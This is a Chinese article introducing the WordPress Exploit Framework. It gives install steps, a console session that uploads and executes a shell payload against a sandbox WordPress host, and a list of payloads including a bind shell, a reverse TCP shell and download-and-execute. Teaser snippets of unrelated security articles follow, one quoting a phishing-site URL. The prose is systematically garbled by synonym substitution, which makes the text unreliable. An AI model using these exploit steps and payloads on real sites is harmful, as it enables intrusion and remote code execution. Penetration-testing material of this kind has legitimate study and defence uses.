这个Ruby结构包括一些能够浸透测验WordPress网站和体系的模块,用户也能够自己开发模块扩展其功用。
运转它需求什么条件?
保证体系上装置了Ruby 2.2.x,翻开一个指令行窗口,切换当时目录到WPXF文件夹下,运转指令“bundle install”,假如你的体系上没有装置bundler,能够经过履行指令“gem install bundler”装置。
怎么运用它?
翻开一个指令行窗口,切换当时目录到你下载保存WordPress Exploit Framework的途径,履行指令“ruby wpxf.rb”就能够发动它。
wpxf一旦加载起来,会呈现一个wpxf提示符,你能够运用“search”指令来搜索模块,运用“use”指令来加载模块。
把模块加载到程序运转环境中后,能够运用“set”指令来设置选项参数,运用“info”指令检查模块相关的信息。
下面是一个比如,加载“symposium_shell_upload”缝隙运用模块,设置模块和载荷的参数,最终,履行这个缝隙运用模块进犯方针。
wpxf > use exploit/symposium_shell_upload
[+] Loaded module: #
wpxf [exploit/symposium_shell_upload] > set host wp-sandbox
[+] Set host => wp-sandbox
wpxf [exploit/symposium_shell_upload] > set target_uri /wordpress/
[+] Set target_uri => /wordpress/
wpxf [exploit/symposium_shell_upload] > set payload exec
[+] Loaded payload: #
wpxf [exploit/symposium_shell_upload] > set cmd echo "Hello, world!"
[+] Set cmd => echo "Hello, world!"
wpxf [exploit/symposium_shell_upload] > run
[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully
在github能够获得一切指令的列表。
辅佐模块和缝隙运用模块有什么区别?
辅佐模块并不能让你在方针机器上运转进犯载荷,可是能够解析方针的信息,提高权限或许供给拒绝服务的功用。
缝隙运用模块需求你指定一个进犯载荷,这将会在方针机器上履行,你能够在方针机上履行恣意代码提取信息,树立一个长途shell或许其他你想在Web服务器上做的工作。
有哪些可用的载荷?
bind_php:上传一个在特定端口监听的脚本,答应WPXF树立一个长途shell;
custom:上传并履行一个定制的PHP脚本;
download_exec:下载并运转一个长途可履行文件;
exec:在长途服务器上运转一个shell指令,并把成果返回到WPXF会话;
reverse_tcp:上传一个能够树立反连TCP shell的脚本;
除了“custom”,一切这些载荷都会在履行完之后删去自己,防止在运用之后或许树立shell衔接失利之后遗留在方针机器上。
怎么编写自己的模块和载荷?
编写模块和载荷的办法能够在Github找到,一切的API文档都在Getwpxf。
在github能够下载Wordpress-Exploit-Framework
Metasploit是一个十分受欢迎的浸透测验结构,被视为安全测验人员手中的一把利器。但在另一方面由于他过于强壮,因而也常常被一些歹意攻击者所运用。当然,在本文咱们首要评论的是关于内存取证,这对于咱们...
本文将向咱们介绍如安在AIX和Power架构上运转Metasploit结构,这关于那些想要测验在这些架构上运转Metasploit的人可能会有所协助(至少现在我还没有在网上发现关于这方面的教程内容)。...
2019年11月,Trend Micro研究人员发现一个含有暗码盗取模块的Trickbot变种,该暗码盗取模块能够从很多的运用中盗取凭据。2019年1月,研究人员发现一个参加了多个功用的Trickbo...
前段时间有个网友给我发了个网址,说找到个专门做垂钓网站的衔接,让我看看,然后就引出了一系列事情。 网址如下:http://mfnyongshihuigui.jiebao8.top 其时也没介意,有天闲...
前语 php代码审计介绍:望文生义便是查看php源代码中的缺陷和错误信息,剖析并找到这些问题引发的安全漏洞。 1、环境建立: 工欲善其事必先利其器,先介绍代码审计必要的环境建立 审计环境 window...
0x1 前语 (Foreword) 原本我今日想学经过剖析下Fastjson反序列化缝隙学习java,还有研讨下php混杂解密和底层hook技能的,可是今日看到在群里看了这篇文章Discuz!ML v...